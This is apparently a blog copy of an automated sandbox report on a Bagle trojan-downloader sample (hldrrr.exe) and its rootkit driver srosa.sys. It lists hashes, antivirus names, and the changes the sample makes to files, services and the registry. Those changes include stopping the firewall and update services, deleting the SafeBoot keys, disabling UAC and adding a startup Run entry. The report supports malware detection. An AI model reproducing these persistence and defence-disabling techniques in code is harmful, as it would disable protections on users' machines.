Saturday, April 18, 2009

hldrrr.exe srosa.sys bagle

Submission Summary:

  • Submission details:
    • Submission received: 19 April 2009, 12:09:13
    • Processing time: 9 min 24 sec
    • Submitted sample:
      • File MD5: 0x113554AB42E9EF2B530284E51370C507
      • File SHA-1: 0x661783D44061A4AD2077F6C47DBFDDA5AF57A1FE
      • Filesize: 655,360 bytes
      • Alias:
  • Summary of the findings:

What's been found
Severity Level

Capability to terminate Antivirus, Firewall and other security related processes.

Is protected with Themida in order to prevent the sample from being reverse-engineered. Themida protection can potentially be used by a threat to complicate the manual threat analysis (e.g. the sample would not run under the Virtual Machine).

Downloads/requests other files from Internet.

Compromises SafeBoot registry key(s) in an attempt to disable the Safe Mode.

Creates a startup registry entry.

Contains characteristics of an identified security risk.


Possible Security Risk

  • Attention! Characteristics of the following security risks were identified in the system:

Security Risk
Description

Trojan-Downloader.Bagle
Trojan.Downloader.Bagle runs in the background and attempts to download malicious files from the Internet without the users knowledge.

Trojan.Lodear.D
Trojan.Lodear.D is a trojan that will install itself onto infected computers so it will start everytime the system reboots. It will also try to download and install additional malware from a list of predetermined websites.

Rootkit.Agent
Rootkit.Agent is a trojan that hijack browser in order to produce popup advertisements from known badsites and also have rootkit functionality in order to hide itself as system driver.

  • Attention! The following threat categories were identified:

Threat Category
Description


A malicious trojan horse or bot that may represent security risk for the compromised system and/or its network environment


A program that downloads files to the local computer that may represent security risk


A network-aware worm that attempts to replicate across the existing network(s)

File System Modifications

  • The following files were created in the system:

#
Filename(s)
File Size
File Hash
Alias

1
%System%\drivers\hldrrr.exe
[file and pathname of the sample #1]
655,360 bytes
MD5: 0x113554AB42E9EF2B530284E51370C507
SHA-1: 0x661783D44061A4AD2077F6C47DBFDDA5AF57A1FE
Trojan.DL.Bagle.ZPL [PCTools]
W32.Beagle.EB [Symantec]
Trojan-Downloader.Win32.Bagle.ajd [Kaspersky Lab]
Downloader.gen.a [McAfee]
Troj/Agent-GQY [Sophos]
TrojanDownloader:Win32/Bagle.RN [Microsoft]
Trojan-Downloader.Win32.Bagle [Ikarus]
Win-Trojan/Bagle.655360 [AhnLab]

2
%System%\drivers\srosa.sys
100,352 bytes
MD5: 0x09348BABE24297C2911724AD90FC773B
SHA-1: 0x004F941EB05890E960337074F79B83E6A7577C08
Rootkit.Bagle.Gen.21 [PCTools]
Trojan Horse [Symantec]
Trojan-Downloader.Win32.Bagle.jh [Kaspersky Lab]
Generic Downloader.x [McAfee]
Trojan:WinNT/Bagle.gen!B [Microsoft]
Trojan-Downloader.Win32.Bagle [Ikarus]
Win-Trojan/Bagle.100352 [AhnLab]

  • Note:
    • %System% is a variable that refers to the System folder. By default, this is C:\Windows\System (Windows 95/98/Me), C:\Winnt\System32 (Windows NT/2000), or C:\Windows\System32 (Windows XP).
  • The following directory was created:
    • %System%\drivers\down
  • The following directory was deleted:
    • [pathname with a string SHARE]\shared
  • The following system services were modified:

Service Name
Display Name
New Status
Service Filename

ALG
Application Layer Gateway Service
"Stopped"
%System%\alg.exe

SharedAccess
Windows Firewall/Internet Connection Sharing (ICS)
"Stopped"
%System%\svchost.exe -k netsvcs

wscsvc
Security Center
"Stopped"
%System%\svchost.exe -k netsvcs

wuauserv
Automatic Updates
"Stopped"
%System%\svchost.exe -k netsvcs

  • There was a new kernel-mode driver installed in the system:

Driver Name
Driver Filename

Megadrv3
%System%\drivers\srosa.sys

Registry Modifications

  • The following Registry Keys were created:
    • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Security Center
    • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Security Center\Svc
    • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_SROSA
    • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_SROSA\0000
    • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_SROSA\0000\Control
    • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\srosa
    • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\srosa\Security
    • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\srosa\Enum
    • HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_SROSA
    • HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_SROSA\0000
    • HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_SROSA\0000\Control
    • HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\srosa
    • HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\srosa\Security
    • HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\srosa\Enum
    • HKEY_CURRENT_USER\Software\FirstRRRun
    • HKEY_CURRENT_USER\Software\Local AppWizard-Generated Applications
    • HKEY_CURRENT_USER\Software\Local AppWizard-Generated Applications\uiytuhjy
    • HKEY_CURRENT_USER\Software\Local AppWizard-Generated Applications\uiytuhjy\Settings
  • The following Registry Keys were deleted:
    • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot
    • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal
    • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\AppMgmt
    • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\Base
    • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\Boot Bus Extender
    • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\Boot file system
    • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\CryptSvc
    • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\DcomLaunch
    • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\dmadmin
    • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\dmboot.sys
    • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\dmio.sys
    • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\dmload.sys
    • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\dmserver
    • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\EventLog
    • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\File system
    • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\Filter
    • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\HelpSvc
    • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\Netlogon
    • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\PCI Configuration
    • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\PlugPlay
    • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\PNP Filter
    • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\Primary disk
    • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\RpcSs
    • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\SCSI Class
    • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\sermouse.sys
    • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\sr.sys
    • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\SRService
    • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\System Bus Extender
    • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\vga.sys
    • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\vgasave.sys
    • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\WinMgmt
    • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\{36FC9E60-C465-11CF-8056-444553540000}
    • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\{4D36E965-E325-11CE-BFC1-08002BE10318}
    • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318}
    • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\{4D36E969-E325-11CE-BFC1-08002BE10318}
    • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\{4D36E96A-E325-11CE-BFC1-08002BE10318}
    • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\{4D36E96B-E325-11CE-BFC1-08002BE10318}
    • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\{4D36E96F-E325-11CE-BFC1-08002BE10318}
    • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\{4D36E977-E325-11CE-BFC1-08002BE10318}
    • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\{4D36E97B-E325-11CE-BFC1-08002BE10318}
    • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\{4D36E97D-E325-11CE-BFC1-08002BE10318}
    • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\{4D36E980-E325-11CE-BFC1-08002BE10318}
    • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\{71A27CDD-812A-11D0-BEC7-08002BE2092F}
    • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\{745A17A0-74D3-11D0-B6FE-00A0C90F57DA}
    • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Network
    • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Network\AFD
    • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Network\AppMgmt
    • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Network\Base
    • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Network\Boot Bus Extender
    • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Network\Boot file system
    • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Network\Browser
    • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Network\CryptSvc
    • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Network\DcomLaunch
    • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Network\Dhcp
    • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Network\dmadmin
    • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Network\dmboot.sys
    • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Network\dmio.sys
    • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Network\dmload.sys
    • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Network\dmserver
    • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Network\DnsCache
    • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Network\EventLog
    • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Network\File system
    • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Network\Filter
    • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Network\HelpSvc
    • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Network\ip6fw.sys
    • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Network\ipnat.sys
    • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Network\LanmanServer
    • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Network\LanmanWorkstation
    • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Network\LmHosts
    • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Network\Messenger
    • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Network\NDIS
    • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Network\NDIS Wrapper
    • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Network\Ndisuio
    • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Network\NetBIOS
    • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Network\NetBIOSGroup
    • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Network\NetBT
    • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Network\NetDDEGroup
    • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Network\Netlogon
    • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Network\NetMan
    • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Network\Network
    • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Network\NetworkProvider
    • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Network\nm
    • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Network\nm.sys
    • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Network\NtLmSsp
    • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Network\PCI Configuration
    • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Network\PlugPlay
    • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Network\PNP Filter
    • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Network\PNP_TDI
    • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Network\Primary disk
    • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Network\rdpcdd.sys
    • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Network\rdpdd.sys
    • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Network\rdpwd.sys
    • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Network\rdsessmgr
    • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Network\RpcSs
    • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Network\SCSI Class
    • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Network\sermouse.sys
    • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Network\SharedAccess
    • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Network\sr.sys
    • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Network\SRService
    • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Network\Streams Drivers
  • The newly created Registry Values are:
    • [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system]
      • EnableLUA = 0x00000000
    • [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Security Center\Svc]
      • EnableLUA = 0x00000016
    • [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_SROSA\0000\Control]
      • *NewlyCreated* = 0x00000000
      • ActiveService = "srosa"
    • [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_SROSA\0000]
      • Service = "srosa"
      • Legacy = 0x00000001
      • ConfigFlags = 0x00000000
      • Class = "LegacyDriver"
      • ClassGUID = "{8ECC055D-047F-11D1-A537-0000F8753ED1}"
      • DeviceDesc = "Megadrv3"
    • [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_SROSA]
      • NextInstance = 0x00000001
    • [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\srosa\Enum]
      • 0 = "Root\LEGACY_SROSA\0000"
      • Count = 0x00000001
      • NextInstance = 0x00000001
    • [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\srosa\Security]
      • Security = 01 00 14 80 90 00 00 00 9C 00 00 00 14 00 00 00 30 00 00 00 02 00 1C 00 01 00 00 00 02 80 14 00 FF 01 0F 00 01 01 00 00 00 00 00 01 00 00 00 00 02 00 60 00 04 00 00 00 00 00 14 00 FD 01 02 00 01 01 00 00 00 00 00 05 12 00 00 00 00 00 18 00 FF 01 0F 0
    • [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\srosa]
      • Type = 0x00000001
      • Start = 0x00000001
      • ErrorControl = 0x00000000
      • ImagePath = "%System%\drivers\srosa.sys"
      • DisplayName = "Megadrv3"
    • [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_SROSA\0000\Control]
      • *NewlyCreated* = 0x00000000
      • ActiveService = "srosa"
    • [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_SROSA\0000]
      • Service = "srosa"
      • Legacy = 0x00000001
      • ConfigFlags = 0x00000000
      • Class = "LegacyDriver"
      • ClassGUID = "{8ECC055D-047F-11D1-A537-0000F8753ED1}"
      • DeviceDesc = "Megadrv3"
    • [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_SROSA]
      • NextInstance = 0x00000001
    • [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\srosa\Enum]
      • 0 = "Root\LEGACY_SROSA\0000"
      • Count = 0x00000001
      • NextInstance = 0x00000001
    • [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\srosa\Security]
      • Security = 01 00 14 80 90 00 00 00 9C 00 00 00 14 00 00 00 30 00 00 00 02 00 1C 00 01 00 00 00 02 80 14 00 FF 01 0F 00 01 01 00 00 00 00 00 01 00 00 00 00 02 00 60 00 04 00 00 00 00 00 14 00 FD 01 02 00 01 01 00 00 00 00 00 05 12 00 00 00 00 00 18 00 FF 01 0F 0
    • [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\srosa]
      • Type = 0x00000001
      • Start = 0x00000001
      • ErrorControl = 0x00000000
      • ImagePath = "%System%\drivers\srosa.sys"
      • DisplayName = "Megadrv3"
    • [HKEY_CURRENT_USER\Software\FirstRRRun]
      • First12Ru123n = 0x00000001
    • [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
      • drvsyskit = "%System%\drivers\hldrrr.exe"

      so that hldrrr.exe runs every time Windows starts
  • The following Registry Values were deleted:
    • [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Folders]
      • C:\Documents and Settings\UserName\Application Data\Microsoft\Installer\ = ""
      • C:\WINDOWS\Installer\{4275B162-C5C0-4912-9522-E92FE1C4E21D}\ = ""
      • C:\Documents and Settings\UserName\Application Data\Microsoft\Installer\{3966BA0C-23BA-4B20-9B9D-7561DEC54E6A}\ = ""
      • C:\Program Files\VMware\VMware Tools\Drivers\memctl\ = ""
      • C:\Program Files\VMware\VMware Tools\TPOG3\ = ""
      • C:\Program Files\VMware\VMware Tools\TPOG3\amd64\ = ""
      • C:\Program Files\VMware\VMware Tools\TPOG3\i386\ = ""
      • C:\Program Files\VMware\VMware Tools\vmci\ = ""
      • C:\WINDOWS\Installer\{3B410500-1802-488E-9EF1-4B11992E0440}\ = ""
      • C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\ = "1"
      • C:\WINDOWS\Microsoft.NET\Framework\ = "1"
      • C:\WINDOWS\Microsoft.NET\ = "1"
      • C:\WINDOWS\PCHEALTH\ERRORREP\ = "1"
      • C:\WINDOWS\PCHEALTH\ERRORREP\QHEADLES\ = "1"
      • C:\WINDOWS\PCHEALTH\ERRORREP\QSIGNOFF\ = "1"
      • C:\WINDOWS\winsxs\Policies\x86_policy.8.0.Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_x-ww_77c24773\ = ""
      • C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\ASP.NETWebAdminFiles\Security\Users\ = ""
      • C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\ASP.NETWebAdminFiles\Security\ = ""
      • C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\ASP.NETWebAdminFiles\ = ""
      • C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\ASP.NETWebAdminFiles\Security\Users\App_LocalResources\ = ""
      • C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\ASP.NETWebAdminFiles\Images\ = ""
      • C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\1033\ = ""
      • C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\ASP.NETWebAdminFiles\App_GlobalResources\ = ""
      • C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\ASP.NETWebAdminFiles\AppConfig\ = ""
      • C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\ASP.NETWebAdminFiles\AppConfig\App_LocalResources\ = ""
      • C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\ASP.NETWebAdminFiles\App_Code\ = ""
      • C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\RedistList\ = ""
      • C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\CONFIG\Browsers\ = ""
      • C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\CONFIG\ = ""
      • C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\ASP.NETWebAdminFiles\Providers\ = ""
      • C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\ASP.NETWebAdminFiles\Providers\App_LocalResources\ = ""
      • C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\ASP.NETWebAdminFiles\Security\Wizard\ = ""
      • C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\ASP.NETWebAdminFiles\Security\Wizard\App_LocalResources\ = ""
      • C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\ASP.NETWebAdminFiles\Security\Permissions\ = ""
      • C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\ASP.NETWebAdminFiles\Security\Permissions\App_LocalResources\ = ""
      • C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\ASP.NETWebAdminFiles\App_LocalResources\ = ""
      • C:\WINDOWS\Microsoft.NET\Framework\v1.1.4322\ = ""
      • C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\ASP.NETWebAdminFiles\App_Data\ = ""
      • C:\WINDOWS\Microsoft.NET\Framework\v1.0.3705\ = ""
      • C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\ASP.NETWebAdminFiles\Security\Roles\ = ""
      • C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\ASP.NETWebAdminFiles\Security\Roles\App_LocalResources\ = ""
      • C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\MSBuild\ = ""
      • C:\WINDOWS\system32\MUI\0409\ = ""
      • C:\Program Files\Internet Explorer\MUI\0409\ = ""
      • C:\Program Files\Internet Explorer\MUI\ = ""
      • C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\MUI\0409\ = ""
      • C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\MUI\ = ""
      • C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\ASP.NETWebAdminFiles\Security\App_LocalResources\ = ""
      • C:\WINDOWS\winsxs\x86_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.42_x-ww_0de06acd\ = ""
      • C:\Program Files\Common Files\Microsoft Shared\DW\ = ""
      • C:\Program Files\Common Files\Microsoft Shared\DW\1025\ = ""
      • C:\Program Files\Common Files\Microsoft Shared\DW\1028\ = ""
      • C:\Program Files\Common Files\Microsoft Shared\DW\1031\ = ""
      • C:\Program Files\Common Files\Microsoft Shared\DW\1033\ = ""
      • C:\Program Files\Common Files\Microsoft Shared\DW\1036\ = ""
      • C:\Program Files\Common Files\Microsoft Shared\DW\1040\ = ""
      • C:\Program Files\Common Files\Microsoft Shared\DW\1041\ = ""
      • C:\Program Files\Common Files\Microsoft Shared\DW\1042\ = ""
      • C:\Program Files\Common Files\Microsoft Shared\DW\2052\ = ""
      • C:\Program Files\Common Files\Microsoft Shared\DW\3082\ = ""
      • C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\Microsoft .NET Framework 2.0\ = ""
    • [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\SharedDlls]
      • C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\ASP.NETWebAdminFiles\App_LocalResources\error.aspx.resx = 0x00000001
      • C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\ASP.NETWebAdminFiles\Security\Permissions\App_LocalResources\createPermission.aspx.resx = 0x00000001
      • C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\ASP.NETWebAdminFiles\Providers\App_LocalResources\providerList.ascx.resx = 0x00000001
      • C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\ASP.NETWebAdminFiles\App_GlobalResources\AppConfigCommon.resx = 0x00000001
      • C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\ASP.NETWebAdminFiles\Security\Roles\App_LocalResources\manageSingleRole.aspx.resx = 0x00000001
      • C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\ASP.NETWebAdminFiles\Security\App_LocalResources\setUpAuthentication.aspx.resx = 0x00000001
      • C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\ASP.NETWebAdminFiles\Security\Users\App_LocalResources\editUser.aspx.resx = 0x00000001
      • C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\ASP.NETWebAdminFiles\Security\Wizard\App_LocalResources\wizardAddUser.ascx.resx = 0x00000001
      • C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\System.EnterpriseServices.dll = 0x00000001
      • C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\ASP.NETWebAdminFiles\App_Data\GroupedProviders.xml = 0x00000001
      • C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\ASP.NETWebAdminFiles\navigationBar.ascx = 0x00000001
      • C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\ASP.NETWebAdminFiles\AppConfig\SmtpSettings.aspx = 0x00000001
      • C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\ASP.NETWebAdminFiles\App_Code\WebAdminPage.cs = 0x00000001
      • C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\ASP.NETWebAdminFiles\WebAdminHelp.aspx = 0x00000001
      • C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\ASP.NETWebAdminFiles\Images\requiredBang.gif = 0x00000001
      • C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\ASP.NETWebAdminFiles\Security\Permissions\managePermissions.aspx = 0x00000001
      • C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\ASP.NETWebAdminFiles\Providers\ProviderList.ascx = 0x00000001
      • C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\ASP.NETWebAdminFiles\Security\Roles\manageSingleRole.aspx = 0x00000001
      • C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\ASP.NETWebAdminFiles\Security\security.aspx = 0x00000001
      • C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\ASP.NETWebAdminFiles\Security\Users\addUser.aspx = 0x00000001
      • C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\ASP.NETWebAdminFiles\Security\Wizard\wizardAddUser.ascx = 0x00000001
      • C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\1033\alinkui.dll = 0x00000001
      • C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\alink.dll = 0x00000001
      • C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\dfdll.dll = 0x00000001
      • C:\WINDOWS\system32\dfshim.dll = 0x00000001
      • C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\System.Deployment.dll = 0x00000001
      • C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\dfsvc.exe = 0x00000001
      • C:\WINDOWS\Microsoft.NET\Framework\v1.1.4322\gacutil.exe.config = 0x00000001
      • C:\WINDOWS\Microsoft.NET\Framework\v1.1.4322\regsvcs.exe.config = 0x00000001
      • C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\ieexec.exe.config = 0x00000001
